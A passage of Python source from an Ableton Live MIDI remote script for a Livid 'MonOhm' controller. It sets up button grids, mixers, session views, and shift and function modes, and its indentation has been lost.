self._shift_r = MonoButtonElement(is_momentary, MIDI_NOTE_TYPE, CHANNEL, SHIFT_R, 'Shift_Button_Right', self)
self._matrix = ButtonMatrixElement()
self._matrix.name = 'Matrix'
self._monomod = ButtonMatrixElement()
self._monomod.name = 'Monomod'
self._grid = [None for index in range(8)]
for column in range(8):
self._grid[column] = [None for index in range(8)]
for row in range(8):
self._grid[column][row] = MonoButtonElement(is_momentary, MIDI_NOTE_TYPE, CHANNEL, (column * 8) + row, 'Grid_' + str(column) + '_' + str(row), self)
for row in range(5):
button_row = []
for column in range(7):
button_row.append(self._grid[column][row])
self._matrix.add_row(tuple(button_row))
for row in range(8):
button_row = []
for column in range(8):
button_row.append(self._grid[column][row])
self._monomod.add_row(tuple(button_row))
self._dummy_button = ButtonElement(is_momentary, MIDI_NOTE_TYPE, 15, 125)
self._dummy_button.name = 'Dummy1'
self._dummy_button2 = ButtonElement(is_momentary, MIDI_NOTE_TYPE, 15, 126)
self._dummy_button2.name = 'Dummy2'
self._dummy_button3 = ButtonElement(is_momentary, MIDI_NOTE_TYPE, 15, 127)
self._dummy_button2.name = 'Dummy3'
self._pedal = [None for index in range(8)]
if self._use_pedal is True:
for index in range(8):
self._pedal[index] = EncoderElement(MIDI_CC_TYPE, 0, 25+index, Live.MidiMap.MapMode.absolute)
self._pedal[index].name = 'Pedal_'+str(index)
self._pedal[index]._report = False
def _setup_transport_control(self):
self._transport = TransportComponent()
self._transport.name = 'Transport'
def _setup_mixer_control(self):
is_momentary = True
self._num_tracks = (4) #A mixer is one-dimensional;
self._mixer = MixerComponent(8, 0, False, True)
self._mixer.name = 'Left_Mixer'
self._mixer.set_track_offset(0) #Sets start point for mixer strip (offset from left)
for index in range(4):
self._mixer.channel_strip(index).set_volume_control(self._fader[index])
for index in range(8):
self._mixer.channel_strip(index)._on_cf_assign_changed = self.mixer_on_cf_assign_changed(self._mixer.channel_strip(index))
self._mixer.channel_strip(index).name = 'Mixer_ChannelStrip_' + str(index)
self._mixer.track_filter(index).name = 'Mixer_TrackFilter_' + str(index)
self._mixer.channel_strip(index)._invert_mute_feedback = True
self.song().view.selected_track = self._mixer.channel_strip(0)._track #set the selected strip to the first track, so that we don't, for example, try to assign a button to arm the master track, which would cause an assertion error
self._mixer2 = MixerComponent(4, 4, False, False)
self._mixer2.name = 'Right_Mixer'
self._mixer2.set_track_offset(4)
for index in range(4):
self._mixer2.channel_strip(index)._on_cf_assign_changed = self.mixer_on_cf_assign_changed(self._mixer2.channel_strip(index))
self._mixer2.channel_strip(index).name = 'Mixer2_ChannelStrip_' + str(index)
self._mixer2.return_strip(index)._on_cf_assign_changed = self.mixer_on_cf_assign_changed(self._mixer2.return_strip(index))
self._mixer2.return_strip(index).name = 'Mixer2_ReturnStrip_' + str(index)
self._mixer2.channel_strip(index).set_volume_control(self._fader[index + 4])
self._mixer2.channel_strip(index)._invert_mute_feedback = True
self._mixer2.return_strip(index)._invert_mute_feedback = True
self._mixers = [self._mixer, self._mixer2]
self._send_reset = ResetSendsComponent(self)
self._send_reset.name = 'Sends_Reset'
self._mixer._reassign_tracks()
self._mixer2._reassign_tracks()
def _setup_session_control(self):
is_momentary = True
num_tracks = 4
num_scenes = 5
self._session = SessionComponent(num_tracks, num_scenes)
self._session.name = "Left_Session"
self._session.set_offsets(0, 0)
self._session.set_stop_track_clip_value(STOP_CLIP[self._rgb])
self._scene = [None for index in range(5)]
for row in range(num_scenes):
self._scene[row] = self._session.scene(row)
self._scene[row].name = 'L_Scene_' + str(row)
for column in range(num_tracks):
clip_slot = self._scene[row].clip_slot(column)
clip_slot.name = str(column) + '_Clip_Slot_L_' + str(row)
clip_slot.set_triggered_to_play_value(CLIP_TRG_PLAY[self._rgb])
clip_slot.set_triggered_to_record_value(CLIP_TRG_REC[self._rgb])
clip_slot.set_stopped_value(CLIP_STOP[self._rgb])
clip_slot.set_started_value(CLIP_STARTED[self._rgb])
clip_slot.set_recording_value(CLIP_RECORDING[self._rgb])
self._session.set_mixer(self._mixer)
self._session_zoom = SessionZoomingComponent(self._session)
self._session_zoom.name = 'L_Session_Overview'
self._session_zoom.set_stopped_value(ZOOM_STOPPED[self._rgb])
self._session_zoom.set_playing_value(ZOOM_PLAYING[self._rgb])
self._session_zoom.set_selected_value(ZOOM_SELECTED[self._rgb])
self._session_zoom._zoom_button = (self._dummy_button)
self._session_zoom.set_enabled(True)
self._session2 = SessionComponent(num_tracks, num_scenes)
self._session2.name = 'Right_Session'
self._session2.set_offsets(4, 0)
self._session2.set_stop_track_clip_value(STOP_CLIP[self._rgb])
self._scene2 = [None for index in range(5)]
for row in range(num_scenes):
self._scene2[row] = self._session2.scene(row)
self._scene2[row].name = 'R_Scene_' + str(row)
for column in range(num_tracks):
clip_slot = self._scene2[row].clip_slot(column)
clip_slot.name = str(column) + '_Clip_Slot_R_' + str(row)
clip_slot.set_triggered_to_play_value(CLIP_TRG_PLAY[self._rgb])
clip_slot.set_triggered_to_record_value(CLIP_TRG_REC[self._rgb])
clip_slot.set_stopped_value(CLIP_STOP[self._rgb])
clip_slot.set_started_value(CLIP_STARTED[self._rgb])
clip_slot.set_recording_value(CLIP_RECORDING[self._rgb])
self._session2.set_mixer(self._mixer2)
self._session2.add_offset_listener(self._on_session_offset_changes)
self._session_zoom2 = SessionZoomingComponent(self._session2)
self._session_zoom2.name = 'R_Session_Overview'
self._session_zoom2.set_stopped_value(ZOOM_STOPPED[self._rgb])
self._session_zoom2.set_playing_value(ZOOM_PLAYING[self._rgb])
self._session_zoom2.set_selected_value(ZOOM_SELECTED[self._rgb])
self._session_zoom.set_enabled(True)
self._session_zoom2._zoom_button = (self._dummy_button2)
self._session_main = SessionComponent(8, num_scenes)
self._session_main.name = 'Main_Session'
self._session_main.set_stop_track_clip_value(STOP_CLIP[self._rgb])
self._scene_main = [None for index in range(5)]
for row in range(num_scenes):
self._scene_main[row] = self._session_main.scene(row)
self._scene_main[row].name = 'M_Scene_' + str(row)
for column in range(8):
clip_slot = self._scene_main[row].clip_slot(column)
clip_slot.name = str(column) + '_Clip_Slot_M_' + str(row)
clip_slot.set_triggered_to_play_value(CLIP_TRG_PLAY[self._rgb])
clip_slot.set_triggered_to_record_value(CLIP_TRG_REC[self._rgb])
clip_slot.set_stopped_value(CLIP_STOP[self._rgb])
clip_slot.set_started_value(CLIP_STARTED[self._rgb])
clip_slot.set_recording_value(CLIP_RECORDING[self._rgb])
self._session_main.set_mixer(self._mixer)
self._session_zoom_main = SessionZoomingComponent(self._session_main)
self._session_zoom_main.name = 'M_Session_Overview'
self._session_zoom_main.set_stopped_value(ZOOM_STOPPED[self._rgb])
self._session_zoom_main.set_playing_value(ZOOM_PLAYING[self._rgb])
self._session_zoom_main.set_selected_value(ZOOM_SELECTED[self._rgb])
self._session_zoom_main.set_enabled(True)
self._session_zoom_main._zoom_button = (self._dummy_button3)
self._sessions = [self._session, self._session2, self._session_main]
self._zooms = [self._session_zoom, self._session_zoom2, self._session_zoom_main]
def _assign_session_colors(self):
num_tracks = 4
num_scenes = 5
self._session.set_stop_track_clip_value(STOP_ALL[self._rgb])
self._session2.set_stop_track_clip_value(STOP_ALL[self._rgb])
self._session_main.set_stop_track_clip_value(STOP_ALL[self._rgb])
for row in range(num_scenes):
for column in range(num_tracks):
self._scene[row].clip_slot(column).set_triggered_to_play_value(CLIP_TRG_PLAY[self._rgb])
self._scene[row].clip_slot(column).set_triggered_to_record_value(CLIP_TRG_REC[self._rgb])
self._scene[row].clip_slot(column).set_stopped_value(CLIP_STOP[self._rgb])
self._scene[row].clip_slot(column).set_started_value(CLIP_STARTED[self._rgb])
self._scene[row].clip_slot(column).set_recording_value(CLIP_RECORDING[self._rgb])
self._scene2[row].clip_slot(column).set_triggered_to_play_value(CLIP_TRG_PLAY[self._rgb])
self._scene2[row].clip_slot(column).set_triggered_to_record_value(CLIP_TRG_REC[self._rgb])
self._scene2[row].clip_slot(column).set_stopped_value(CLIP_STOP[self._rgb])
self._scene2[row].clip_slot(column).set_started_value(CLIP_STARTED[self._rgb])
self._scene2[row].clip_slot(column).set_recording_value(CLIP_RECORDING[self._rgb])
for row in range(num_scenes):
for column in range(8):
self._scene_main[row].clip_slot(column).set_triggered_to_play_value(CLIP_TRG_PLAY[self._rgb])
self._scene_main[row].clip_slot(column).set_triggered_to_record_value(CLIP_TRG_REC[self._rgb])
self._scene_main[row].clip_slot(column).set_stopped_value(CLIP_STOP[self._rgb])
self._scene_main[row].clip_slot(column).set_started_value(CLIP_STARTED[self._rgb])
self._scene_main[row].clip_slot(column).set_recording_value(CLIP_RECORDING[self._rgb])
self._session_zoom.set_stopped_value(ZOOM_STOPPED[self._rgb])
self._session_zoom.set_playing_value(ZOOM_PLAYING[self._rgb])
self._session_zoom.set_selected_value(ZOOM_SELECTED[self._rgb])
self._session_zoom2.set_stopped_value(ZOOM_STOPPED[self._rgb])
self._session_zoom2.set_playing_value(ZOOM_PLAYING[self._rgb])
self._session_zoom2.set_selected_value(ZOOM_SELECTED[self._rgb])
self._session_zoom_main.set_stopped_value(ZOOM_STOPPED[self._rgb])
self._session_zoom_main.set_playing_value(ZOOM_PLAYING[self._rgb])
self._session_zoom_main.set_selected_value(ZOOM_SELECTED[self._rgb])
self.refresh_state()
def _setup_device_control(self):
self._device = DeviceComponent()
self._device.name = 'Device_Component'
self._device.set_device = self.device_set_device(self._device)
self._device._is_banking_enabled = self.device_is_banking_enabled(self._device)
self.set_device_component(self._device)
#self.bank = DeviceCallbackComponent(self._device, 1)
#self.bank.name = 'Device_Bank'
#self.device_instance = DeviceCallbackComponent(self._device, 2)
#self.device_instance.name = 'Device_Instance'
self._device_navigator = DetailViewControllerComponent()
self._device_navigator.name = 'Device_Navigator'
self._device_selection_follows_track_selection = FOLLOW
self._device.set_parameter_controls(tuple([self._dial[index] for index in range(8)]))
self._device.set_enabled(False)
def _setup_crossfader(self):
self._mixer.set_crossfader_control(self._crossfader)
def _setup_device_selector(self):
self._device_selector = DeviceSelectorComponent(self)
self._device_selector.name = 'Device_Selector'
def _setup_monomod(self):
self._host = MonomodComponent(self)
self._host.name = 'Monomod_Host'
self._host._host_name = 'MonOhm'
self.hosts = [self._host]
def _setup_modes(self):
self._monomod_mode = MonomodModeComponent(self, self.monomod_mode_update)
self._monomod_mode.name = 'Monomod_Mode'
self._monomod_mode.set_mode_toggle(self._livid)
self._shift_mode = ShiftModeComponent(self, self.shift_update)
self._shift_mode.name = 'Shift_Mode'
self._shift_mode.set_mode_toggle(self._shift_l, self._shift_r)
self._l_function_mode = FunctionModeComponent(self, self.l_function_update)
self._l_function_mode.name = 'Left_Function_Mode'
self._r_function_mode = FunctionModeComponent(self, self.r_function_update)
self._r_function_mode.name = 'Right_Function_Mode'
self._m_function_mode = FunctionModeComponent(self, self.m_function_update)
self._m_function_mode.name = 'Main_Function_Mode'
self._function_modes = [self._l_function_mode, self._r_function_mode, self._m_function_mode]
"""shift/zoom methods"""
def deassign_matrix(self):
for session in self._sessions:
session.set_stop_track_clip_buttons(None)
session.set_track_bank_buttons(None, None)
session.set_scene_bank_buttons(None, None)
for zoom in self._zooms:
zoom.set_button_matrix(None)
zoom.set_nav_buttons(None, None, None, None)
for column in range(4):
self._mixer2.channel_strip(column).set_select_button(None)
self._mixer2.return_strip(column).set_mute_button(None)
self._mixer2.return_strip(column).set_solo_button(None)
self._mixer2.return_strip(column).set_arm_button(None)
self._mixer2.return_strip(column).set_crossfade_toggle(None)
self._mixer2.return_strip(column).set_select_button(None) #shouldn't this be somewhere else?
self._mixer2.channel_strip(column).set_crossfade_toggle(None)
self._mixer2.channel_strip(column).set_mute_button(None)
self._mixer2.channel_strip(column).set_solo_button(None)
self._mixer2.channel_strip(column).set_arm_button(None)
for row in range(5):
self._scene[row].clip_slot(column).set_launch_button(None)
self._scene2[row].clip_slot(column).set_launch_button(None)
for index in range(5):
self._scene[index].set_launch_button(None)
self._scene2[index].set_launch_button(None)
self._scene_main[index].set_launch_button(None)
for column in range(8):
self._button[column].set_on_off_values(127, 0)
self._mixer.channel_strip(column).set_select_button(None)
self._mixer.channel_strip(column).set_crossfade_toggle(None)
self._mixer.channel_strip(column).set_mute_button(None)
self._mixer.channel_strip(column).set_solo_button(None)
self._mixer.channel_strip(column).set_arm_button(None)
for row in range(5):
self._scene_main[row].clip_slot(column).set_launch_button(None)
for row in range(8):
self._grid[column][row].set_channel(0)
self._grid[column][row].release_parameter()
self._grid[column][row].use_default_message()
self._grid[column][row].set_enabled(True)
self._grid[column][row].set_on_off_values(127, 0)
self._grid[column][row].send_value(0, True)
self._send_reset.set_buttons(tuple(None for index in range(4)))
def zoom_off(self):
for column in range(4):
self._grid[column][5].set_on_value(MUTE[self._rgb])
self._mixer.channel_strip(column).set_mute_button(self._grid[column][5])
self._grid[column][6].set_on_value(SOLO[self._rgb])
self._mixer.channel_strip(column).set_solo_button(self._grid[column][6])
self._grid[column][7].set_on_value(ARM[self._rgb])
self._mixer.channel_strip(column).set_arm_button(self._grid[column][7])
for row in range(5):
self._scene[row].clip_slot(column).set_launch_button(self._grid[column][row])
if(self._r_function_mode._mode_index in range(0,3)):
self._grid[column + 4][5].set_on_value(MUTE[self._rgb])
self._mixer2.channel_strip(column).set_mute_button(self._grid[column + 4][5])
self._grid[column + 4][6].set_on_value(SOLO[self._rgb])
self._mixer2.channel_strip(column).set_solo_button(self._grid[column + 4][6])
self._grid[column + 4][7].set_on_value(ARM[self._rgb])
self._mixer2.channel_strip(column).set_arm_button(self._grid[column + 4][7])
for row in range(5):
self._scene2[row].clip_slot(column).set_launch_button(self._grid[column + 4][row])
elif(self._r_function_mode._mode_index is 3):
self._grid[column + 4][5].set_on_value(MUTE[self._rgb])
self._mixer2.return_strip(column).set_mute_button(self._grid[column + 4][5])
self._grid[column + 4][6].set_on_value(SOLO[self._rgb])
self._mixer2.return_strip(column).set_solo_button(self._grid[column + 4][6])
#self._mixer2.return_strip(column).set_crossfade_toggle(self._grid[column + 4][7])
for row in range(5):
self._grid[column + 4][row].send_value(USER1_COLOR[self._rgb], True)
self._grid[column + 4][row].set_channel(RIGHT_USER1_CHANNEL)
self._grid[column + 4][row].set_identifier(RIGHT_USER1_MAP[column][row])
self._grid[column + 4][row].set_enabled(False) #this has to happen for translate to work
if(self._r_function_mode._mode_index is 0):
for index in range(4):
self._grid[index + 4][7].send_value(SEND_RESET[self._rgb], True)
self._send_reset.set_buttons(tuple(self._grid[index + 4][7] for index in range(4)))
def zoom_off_m(self):
self.deassign_right_controls()
for column in range(8):
self._grid[column][5].set_on_value(MUTE[self._rgb])
self._mixer.channel_strip(column).set_mute_button(self._grid[column][5])
self._grid[column][6].set_on_value(SOLO[self._rgb])
self._mixer.channel_strip(column).set_solo_button(self._grid[column][6])
self._grid[column][7].set_on_value(ARM[self._rgb])
self._mixer.channel_strip(column).set_arm_button(self._grid[column][7])
for row in range(5):
self._scene_main[row].clip_slot(column).set_launch_button(self._grid[column][row])
def zoom_left(self):
track_stop_buttons = []
track_stop_buttons2 = []
for index in range(4):
self._grid[index][6].set_on_value(CROSSFADE_TOGGLE[self._rgb])
self._mixer.channel_strip(index).set_crossfade_toggle(self._grid[index][6])
self._grid[index + 4][6].set_on_value(CROSSFADE_TOGGLE[self._rgb])
self._mixer2.channel_strip(index).set_crossfade_toggle(self._grid[index + 4][6])
self._grid[index][7].set_on_value(TRACK_STOP[self._rgb])
track_stop_buttons.append(self._grid[index][7])
self._grid[index + 4][7].set_on_value(TRACK_STOP[self._rgb])
track_stop_buttons2.append(self._grid[index + 4][7])
for index in range(5):
self._grid[7][index].set_off_value(SCENE_LAUNCH[self._rgb])
self._scene[index].set_launch_button(self._grid[7][index])
self._session.set_stop_track_clip_buttons(tuple(track_stop_buttons))
self._session2.set_stop_track_clip_buttons(tuple(track_stop_buttons2))
self._session_zoom.set_button_matrix(self._matrix)
self._grid[0][5].set_on_value(RECORD[self._rgb])
self._transport.set_record_button(self._grid[0][5])
self._grid[1][5].set_on_value(OVERDUB[self._rgb])
self._transport.set_overdub_button(self._grid[1][5])
self._grid[2][5].set_on_value(LOOP[self._rgb])
self._transport.set_loop_button(self._grid[2][5])
self._grid[3][5].set_on_value(STOP_ALL[self._rgb])
self._session.set_stop_all_clips_button(self._grid[3][5])
for index in range(4):
self._grid[index + 4][5].send_value(SEND_RESET[self._rgb], True)
self._send_reset.set_buttons(tuple(self._grid[index + 4][5] for index in range(4)))
for index in range(4):
self._button[index + 4].set_off_value(DEVICE_SELECT[self._rgb])
self._device_selector.assign_buttons(tuple(self._button[index + 4] for index in range(4)), 4)
def zoom_right(self):
track_stop_buttons = []
track_stop_buttons2 = []
for index in range(4):
self._grid[index][6].set_on_value(CROSSFADE_TOGGLE[self._rgb])
self._mixer.channel_strip(index).set_crossfade_toggle(self._grid[index][6])
self._grid[index][7].set_off_value(TRACK_STOP[self._rgb])
track_stop_buttons.append(self._grid[index][7])
for index in range(5):
self._grid[7][index].set_off_value(SCENE_LAUNCH[self._rgb])
self._scene2[index].set_launch_button(self._grid[7][index])
self._session.set_stop_track_clip_buttons(tuple(track_stop_buttons))
if(self._r_function_mode._mode_index < 3):
for index in range(4):
self._grid[index + 4][6].set_on_value(CROSSFADE_TOGGLE[self._rgb])
self._mixer2.channel_strip(index).set_crossfade_toggle(self._grid[index + 4][6])
self._grid[index + 4][7].set_off_value(TRACK_STOP[self._rgb])
track_stop_buttons2.append(self._grid[index + 4][7])
self._session2.set_stop_track_clip_buttons(tuple(track_stop_buttons2))
else:
for index in range(4):
self._grid[index + 4][6].set_on_value(CROSSFADE_TOGGLE[self._rgb])
self._mixer2.return_strip(index).set_crossfade_toggle(self._grid[index + 4][6])
self._session_zoom2.set_button_matrix(self._matrix)
self._grid[0][5].set_on_value(RECORD[self._rgb])
self._transport.set_record_button(self._grid[0][5])
self._grid[1][5].set_on_value(OVERDUB[self._rgb])
self._transport.set_overdub_button(self._grid[1][5])
self._grid[2][5].set_on_value(LOOP[self._rgb])
self._transport.set_loop_button(self._grid[2][5])
self._grid[3][5].set_on_value(STOP_ALL[self._rgb])
self._session.set_stop_all_clips_button(self._grid[3][5])
for index in range(4):
self._grid[index + 4][5].send_value(SEND_RESET[self._rgb], True)
self._send_reset.set_buttons(tuple(self._grid[index + 4][5] for index in range(4)))
for index in range(4):
self._button[index]._off_value = DEVICE_SELECT[self._rgb]
self._device_selector.assign_buttons(tuple(self._button[index] for index in range(4)), 0)
def zoom_main(self):
track_stop_buttons = []
for index in range(8):
self._grid[index][6].set_on_value(CROSSFADE_TOGGLE[self._rgb])
self._mixer.channel_strip(index).set_crossfade_toggle(self._grid[index][6])
self._grid[index][7].set_on_value(TRACK_STOP[self._rgb])
track_stop_buttons.append(self._grid[index][7])
for index in range(5):
self._grid[7][index].set_on_value(SCENE_LAUNCH[self._rgb])
self._scene_main[index].set_launch_button(self._grid[7][index])
self._session_main.set_stop_track_clip_buttons(tuple(track_stop_buttons))
self._session_zoom_main.set_button_matrix(self._matrix)
self._grid[0][5].set_on_value(RECORD[self._rgb])
self._transport.set_record_button(self._grid[0][5])
self._grid[1][5].set_on_value(OVERDUB[self._rgb])
self._transport.set_overdub_button(self._grid[1][5])
self._grid[2][5].set_on_value(LOOP[self._rgb])
self._transport.set_loop_button(self._grid[2][5])
self._grid[3][5].set_on_value(STOP_ALL[self._rgb])
self._session.set_stop_all_clips_button(self._grid[3][5])
for index in range(4):
self._grid[index + 4][5].send_value(SEND_RESET[self._rgb], True)
self._send_reset.set_buttons(tuple(self._grid[index + 4][5] for index in range(4)))
for index in range(4):
self._button[index + 4].set_off_value(DEVICE_SELECT[self._rgb])
self._device_selector.assign_buttons(tuple(self._button[index + 4] for index in range(4)), 4)
"""function mode callbacks"""
def l_function_update(self):
mode = self._l_function_mode._mode_index
if(self._l_function_mode.is_enabled() is False):
self._l_function_mode.set_mode_buttons(None)
elif(self._l_function_mode.is_enabled() is True):
if(len(self._l_function_mode._modes_buttons) is 0):
for index in range(4):
self._mixer.channel_strip(index).set_select_button(None)
buttons = []
for index in range(4):
buttons.append(self._button[index])
self._l_function_mode.set_mode_buttons(tuple(buttons))
if(self._shift_mode._mode_index is 2):
for index in range(4):
if(mode != index):
self._button[index].turn_off()
else:
self._button[index].turn_on()
if(mode is 0):
self.assign_left_device_dials()
self.show_message('Mixer Split:Left Side Dials in Device(Top) and Selected Send(Bottom) Mode')
elif(mode is 1):
self.assign_left_send_dials()
self.show_message('Mixer Split:Left Side Dials in Channel Send Mode (Sends 1-3)')
elif(mode is 2):
self.assign_left_filter_dials()
self.show_message('Mixer Split:Left Side Dials in Filter(Top) and Pan(Bottom) Mode')
elif(mode is 3):
self.assign_left_user_dials()
self.show_message('Mixer Split:Left Side Dials in User Map Mode')
def r_function_update(self):
mode = self._r_function_mode._mode_index
if(self._r_function_mode.is_enabled() is False):
self._r_function_mode.set_mode_buttons(None)
self.set_highlighting_session_component(self._session2)
self._session2._do_show_highlight()
#self._session._highlighting_callback(self._session._track_offset, self._session._scene_offset, 4, 5, 1)
elif(self._r_function_mode.is_enabled() is True):
if(len(self._r_function_mode._modes_buttons) is 0):
for index in range(4):
self._mixer2.channel_strip(index).set_select_button(None)
buttons = []
for index in range(4):
buttons.append(self._button[index + 4])
self._r_function_mode.set_mode_buttons(tuple(buttons))
if(self._shift_mode._mode_index is 3):
for index in range(4):
if(mode != index):
self._button[index + 4].turn_off()
else:
self._button[index + 4].turn_on()
if(mode is 3):
self.assign_right_return_controls()
self.show_message('Mixer Split:Right Side Faders = Returns 1-4, Dials = Returns Pan')
else: ##(mode in range(0, 3):
self.assign_right_volume_controls()
self._session2.set_offsets(int(self._mem[mode]), self._session2._scene_offset)
self.show_message('Mixer Split:Right Side Faders = Channel Mixer, Dials = Returns, Track Offset' + str(RIGHT_MODE_OFFSETS[mode]))
self._ohm_type = OHM_TYPE[mode]
self._ohm = OHM_VALUE[mode]
def m_function_update(self):
mode = self._m_function_mode._mode_index
if(self._m_function_mode.is_enabled() is False):
self._m_function_mode.set_mode_buttons(None)
#self._session.set_show_highlight(False)
#self._session2.set_show_highlight(False)
self.set_highlighting_session_component(self._session_main)
self._session_main._do_show_highlight()
#self._session_main._highlighting_callback(self._session_main._track_offset, self._session_main._scene_offset, 8, 5, 1)
elif(self._m_function_mode.is_enabled() is True):
if(len(self._m_function_mode._modes_buttons) is 0):
for index in range(8):
self._mixer.channel_strip(index).set_select_button(None)
buttons = []
for index in range(4):
buttons.append(self._button[index])
self._m_function_mode.set_mode_buttons(tuple(buttons))
if(self._shift_mode._mode_index is 4):
for index in range(4):
if(mode != index):
self._button[index].turn_off()
else:
self._button[index].turn_on()
if(mode is 0):
self.assign_main_controls1()
self.show_message('Mixer Linked:Dials in Device(Top) and Selected Send(Bottom) Mode')
elif(mode is 1):
self.assign_main_controls2()
self.show_message('Mixer Linked:Dials in Channel Send Mode (Sends 1-3)')
elif(mode is 2):
self.assign_main_controls3()
self.show_message('Mixer Linked:Left Dials in Filter(Top) and Pan(Bottom) Mode')
elif(mode is 3):
self.assign_main_controls4()
self.show_message('Mixer Linked:Dials in User Map Mode')
def shift_update(self):
self._clutch_device_selection = True
self.allow_updates(False)
self.deassign_channel_select_buttons()
self.deassign_matrix()
self.deassign_menu()
if(self._cntrlr != None):
self._cntrlr._monohm_shift(self._shift_mode._mode_index)
if(self._monomod_mode._mode_index is 0): #if monomod is not on
if(self._shift_mode._mode_index is 0): #if no shift is pressed
self._shift_mode._mode_toggle1.turn_off()
self._shift_mode._mode_toggle2.turn_off()
if(self.split_mixer() is False):
self.set_split_mixer(True)
for zoom in self._zooms:
zoom._on_zoom_value(0)
self.zoom_off()
self._device_selector.set_enabled(False)
for mode in self._function_modes:
mode.set_enabled(False)
self.assign_channel_select_buttons()
#self._recalculate_selected_channel()
#self.assign_transport_to_menu()
self.assign_session_nav_to_menu()
self.l_function_update()
self.r_function_update()
self.set_highlighting_session_component(self._session)
self._session._do_show_highlight()
elif(self._shift_mode._mode_index is 1): #if no shift is pressed, but mixer is linked
self._shift_mode._mode_toggle1.turn_on()
self._shift_mode._mode_toggle2.turn_on()
if(self.split_mixer() is True):
self.set_split_mixer(False)
for zoom in self._zooms:
zoom._on_zoom_value(0)
self.zoom_off_m()
self._device_selector.set_enabled(False)
for mode in self._function_modes:
mode.set_enabled(False)
self.assign_main_channel_select_buttons()
self.assign_session_main_nav_to_menu()
self.m_function_update()
self.set_highlighting_session_component(self._session_main)
self._session_main._do_show_highlight()
elif(self._shift_mode._mode_index > 1): #if a shift is pressed
self.assign_device_nav_to_menu()
self.deassign_channel_select_buttons()
if(self._shift_mode._mode_index is 2): #if shift left
self._shift_mode._mode_toggle1.turn_on()
self.zoom_left()
#self._session_zoom._zoom_value(1)
self._session_zoom._on_zoom_value(1)
self._session.set_enabled(True) #this is a workaround so that the stop buttons still function
self._l_function_mode.set_enabled(True)
self.set_highlighting_session_component(self._session)
self._session._do_show_highlight()
elif(self._shift_mode._mode_index is 3): #if shift right
self._shift_mode._mode_toggle2.turn_on()
self.zoom_right()
self._session_zoom2._on_zoom_value(1)
self._session2.set_enabled(True) #this is a workaround so that the stop buttons still function
self._r_function_mode.set_enabled(True)
self.assign_shift_controls()
if(self._r_function_mode._mode_index < 4):
self.set_highlighting_session_component(self._session2)
self._session2._do_show_highlight()
elif(self._shift_mode._mode_index is 4): #if either shift pressed while mixer is linked
self._shift_mode._mode_toggle1.turn_on()
self._shift_mode._mode_toggle2.turn_on()
self.zoom_main()
self._session_zoom_main._on_zoom_value(1)
self._session_main.set_enabled(True) #this is a workaround so that the stop buttons still function
self._m_function_mode.set_enabled(True)
self.assign_shift_controls()
self.set_highlighting_session_component(self._session_main)
self._session_main._do_show_highlight()
self._device_selector.set_enabled(True)
else:
if(self._shift_mode._mode_index is 0): #if no shift is pressed
self._shift_mode._mode_toggle1.turn_off()
self._shift_mode._mode_toggle2.turn_off()
if(self.split_mixer() is False):
self.set_split_mixer_monomod(True)
self._device_selector.set_enabled(False)
for mode in self._function_modes:
mode.set_enabled(False)
self.l_function_update()
self.r_function_update()
self.assign_channel_select_buttons()
#self._recalculate_selected_channel()
elif(self._shift_mode._mode_index is 1): #if no shift is pressed, but mixer is linked
self._shift_mode._mode_toggle1.turn_on()
self._shift_mode._mode_toggle2.turn_on()
if(self.split_mixer() is True):
self.set_split_mixer(False)
self._device_selector.set_enabled(False)
for mode in self._function_modes:
mode.set_enabled(False)
self.m_function_update()
self.assign_main_channel_select_buttons()
elif(self._shift_mode._mode_index > 1): #if a shift is pressed
self.deassign_channel_select_buttons()
self.assign_monomod_shift_to_menu()
if(self._shift_mode._mode_index is 2): #if shift left
self._shift_mode._mode_toggle1.turn_on()
for index in range(4):
self._button[index + 4]._off_value = DEVICE_SELECT[self._rgb]
self._device_selector.assign_buttons(tuple(self._button[index + 4] for index in range(4)), 4)
self._l_function_mode.set_enabled(True)
self._session.set_show_highlight(True)
elif(self._shift_mode._mode_index is 3): #if shift right
self._shift_mode._mode_toggle2.turn_on()
for index in range(4):
self._button[index]._off_value = DEVICE_SELECT[self._rgb]
self._device_selector.assign_buttons(tuple(self._button[index] for index in range(4)), 0)
self._r_function_mode.set_enabled(True)
self.assign_shift_controls()
if(self._r_function_mode._mode_index < 4):
self.set_highlighting_session_component(self._session2)
self._session2._do_show_highlight()
elif(self._shift_mode._mode_index is 4): #if either shift pressed while mixer is linked
self._shift_mode._mode_toggle1.turn_on()
self._shift_mode._mode_toggle2.turn_on()
for index in range(4):
self._button[index + 4]._off_value = DEVICE_SELECT[self._rgb]
self._device_selector.assign_buttons(tuple(self._button[index + 4] for index in range(4)), 4)
self._m_function_mode.set_enabled(True)
self.assign_shift_controls()
self._session_main.set_show_highlight(True)
self._device_selector.set_enabled(True)
if self._shift_mode._mode_index > 1:
self._host._shift_value(1)
else:
self._host._shift_value(0)
self.allow_updates(True)
self._clutch_device_selection = False
#self._request_rebuild_midi_map()
if(self._shift_mode._mode_index < 2):
self._monobridge._send('touch', 'off')
else:
self._monobridge._send('touch', 'on')
def monomod_mode_update(self):
if(self._monomod_mode._mode_index == 0):
self._host.set_enabled(False)
self._host._set_button_matrix(None)
self._host._set_nav_buttons(None)
self._host._set_lock_button(None)
self._host._set_alt_button(None)
self._livid.turn_off()
self._shift_mode.update()
#self._session._reassign_scenes()
elif(self._monomod_mode._mode_index == 1):
self._livid.turn_on()
#self.deassign_matrix() #moved to set_mode so that the matrix doesn't clear AFTER it has been loaded by monomod
if(self._host._active_client == None):
self.assign_alternate_mappings()
else:
self.deassign_matrix()
self.deassign_menu()
self._monomod.reset()
self._host._set_button_matrix(self._monomod)
self._host._set_nav_buttons([self._menu[0], self._menu[3], self._menu[4], self._menu[5]])
self._host._set_lock_button(self._menu[1])
self._host._set_alt_button(self._menu[2])
self._host.set_enabled(True)
self._shift_mode.update()
#self.show_message('Monomod grid enabled')
"""left control management methods"""
def deassign_left_dials(self):
for index in range(12):
self._dial[index].use_default_message()
self._dial[index].release_parameter()
self._dial[index].set_enabled(True)
if(self._device._parameter_controls != None):
for control in self._device._parameter_controls:
control.release_parameter()
self._device._parameter_controls = None
self._device.set_enabled(False)
self._mixer.selected_strip().set_send_controls(None)
for track in range(4):
self._mixer.channel_strip(track).set_send_controls(None)
self._mixer.channel_strip(track).set_pan_control(None)
def assign_left_device_dials(self):
self.log_message('assign left device dials')
self._backlight_type = BACKLIGHT_TYPE[0]
self._backlight = BACKLIGHT_VALUE[0]
self.deassign_left_dials()
self._device.set_enabled(True)
self._device.set_parameter_controls(tuple(self._dial[0:8]))
self._mixer.selected_strip().set_send_controls(tuple(self._dial[8:12]))
def assign_left_send_dials(self):
